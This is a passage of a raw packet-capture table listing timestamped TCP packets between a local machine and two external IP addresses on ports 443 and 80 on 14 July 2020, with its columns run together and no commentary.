                                                                                                                                      Jul 14, 2020 11:20:35.660191059 CEST44349707185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:35.660209894 CEST44349707185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:35.660228968 CEST44349707185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:35.660247087 CEST44349707185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:35.660258055 CEST49707443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:35.660267115 CEST44349707185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:35.660286903 CEST44349707185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:35.660306931 CEST44349707185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:35.660325050 CEST44349707185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:35.660343885 CEST44349707185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:35.660362959 CEST44349707185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:35.660514116 CEST49707443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:35.788597107 CEST44349707185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:35.788680077 CEST44349707185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:35.788723946 CEST44349707185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:35.788765907 CEST44349707185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:35.788815022 CEST44349707185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:35.788853884 CEST44349707185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:35.788889885 CEST44349707185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:35.788928032 CEST44349707185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:35.788968086 CEST44349707185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:35.789073944 CEST49707443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:35.789239883 CEST49707443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:40.144016027 CEST4970880192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:20:40.203697920 CEST804970891.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:40.204034090 CEST4970880192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:20:40.204413891 CEST4970880192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:20:40.263976097 CEST804970891.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:40.264117956 CEST4970880192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:20:40.323795080 CEST804970891.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:40.383061886 CEST804970891.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:40.383109093 CEST804970891.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:40.383207083 CEST4970880192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:20:40.404150009 CEST4970880192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:20:40.463787079 CEST804970891.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:41.062810898 CEST44349707185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:41.062851906 CEST44349707185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:41.062936068 CEST49707443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:43.650592089 CEST49709443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:43.782231092 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:43.782454967 CEST49709443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:43.786017895 CEST49709443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:43.917606115 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:43.917773962 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:43.918081999 CEST49709443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:43.919476986 CEST49709443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:43.923821926 CEST49709443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:44.055322886 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.055640936 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.055748940 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.055764914 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.055784941 CEST49709443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:44.055789948 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.055803061 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.055814981 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.055830002 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.055841923 CEST49709443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:44.055845976 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.055860043 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.055946112 CEST49709443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:44.187455893 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.187515020 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.187555075 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.187578917 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.187598944 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.187628031 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.187653065 CEST49709443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:44.187659025 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.187668085 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.187689066 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.187707901 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.187727928 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.187747002 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.187767029 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.187788963 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.187808990 CEST49709443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:44.187810898 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.187834024 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.187855959 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.187879086 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.187992096 CEST49709443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:44.319418907 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.319559097 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.319572926 CEST49709443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:44.319591045 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.319617987 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.319642067 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.319665909 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.319694996 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.319721937 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.319724083 CEST49709443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:44.319737911 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.319885015 CEST49709443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:44.568655014 CEST49707443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:44.568712950 CEST49707443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:44.573837996 CEST49710443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:44.696876049 CEST44349707185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.697072029 CEST49707443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:44.702330112 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.702523947 CEST49710443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:44.707282066 CEST49710443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:44.835803032 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.835906982 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.836059093 CEST49710443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:44.843225002 CEST49710443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:44.849524021 CEST49710443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:44.978125095 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.978219986 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.978276014 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.978302956 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.978327990 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.978352070 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.978377104 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.978404045 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.978429079 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.978456020 CEST49710443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:44.978458881 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.978485107 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.978584051 CEST49710443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:45.107043982 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.107073069 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.107090950 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.107119083 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.107141972 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.107160091 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.107177019 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.107193947 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.107228994 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.107247114 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.107264996 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.107311010 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.107333899 CEST49710443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:45.107340097 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.107367992 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.107397079 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.107423067 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.107443094 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.107456923 CEST49710443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:45.107464075 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.107484102 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.107501984 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.107597113 CEST49710443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:45.236192942 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.236289978 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.236346006 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.236412048 CEST49710443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:45.236466885 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.236557961 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.236588955 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.236605883 CEST49710443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:45.236627102 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.236664057 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.236701012 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.236730099 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.236752987 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.236776114 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.236803055 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.236829042 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.236855030 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.236881971 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.236900091 CEST49710443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:45.236908913 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.236934900 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.236958027 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.236980915 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.237005949 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.237031937 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.237057924 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.237088919 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.237131119 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.237139940 CEST49710443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:45.237169027 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.237210035 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.237240076 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.237266064 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.237267971 CEST49710443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:45.237293005 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.237315893 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.237339020 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.237360954 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.237384081 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.237406015 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.237428904 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.237451077 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.237473965 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.237497091 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.237519979 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.237731934 CEST49710443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:45.366123915 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.366162062 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.366183996 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.366208076 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.366231918 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.366255045 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.366276979 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.366301060 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.366311073 CEST49710443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:45.366322041 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.366347075 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.366425037 CEST49710443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:46.780814886 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:20:46.872651100 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:46.872814894 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:20:47.414891005 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:20:47.471918106 CEST4971180192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:20:47.503587008 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:47.503717899 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:20:47.536142111 CEST804971191.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:47.536407948 CEST4971180192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:20:47.536647081 CEST4971180192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:20:47.600753069 CEST804971191.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:47.600995064 CEST4971180192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:20:47.665286064 CEST804971191.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:47.750269890 CEST804971191.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:47.750299931 CEST804971191.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:47.750380039 CEST4971180192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:20:47.776303053 CEST4971180192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:20:47.840558052 CEST804971191.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:48.780544043 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:20:48.869982958 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:48.870196104 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:20:49.864257097 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:49.864300966 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:49.864448071 CEST49709443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:50.487967968 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:20:50.576773882 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:50.577143908 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:20:51.071022987 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:20:51.159069061 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:51.159182072 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:20:51.760432959 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:51.760464907 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:51.760493040 CEST49710443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:51.760612965 CEST49710443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:51.771171093 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:20:51.864172935 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:51.864284039 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:20:52.231311083 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:20:52.319689035 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:52.319865942 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:20:52.748272896 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:20:52.841948986 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:52.842122078 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:20:53.165904999 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:20:53.257359028 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:53.257487059 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:20:53.590437889 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:20:53.680881023 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:53.681041002 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:20:54.015072107 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:20:54.102811098 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:54.103132010 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:20:54.420243979 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:20:54.508830070 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:54.509226084 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:20:54.879888058 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:20:54.967772961 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:54.967951059 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:20:55.323348045 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:20:55.411665916 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:55.411830902 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:20:55.715173006 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:20:55.803328037 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:55.803541899 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:20:56.118315935 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:20:56.206547976 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:56.206805944 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:20:56.515702963 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:20:56.603728056 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:56.604010105 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:20:56.913007021 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:20:57.003186941 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:57.003505945 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:20:57.308516026 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:20:57.396816969 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:57.397053003 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:20:57.710084915 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:20:57.800950050 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:57.801256895 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:20:58.160001040 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:20:58.248193026 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:58.248359919 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:20:58.584129095 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:20:58.674938917 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:58.675134897 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:20:58.996056080 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:20:59.084211111 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:59.084388971 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:20:59.387290001 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:20:59.475527048 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:59.475701094 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:00.137196064 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:00.234807014 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:00.235012054 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:01.166742086 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:01.257086039 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:01.257251978 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:01.638675928 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:01.727490902 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:01.727709055 CEST4970680192.168.1.10291.218.231.226
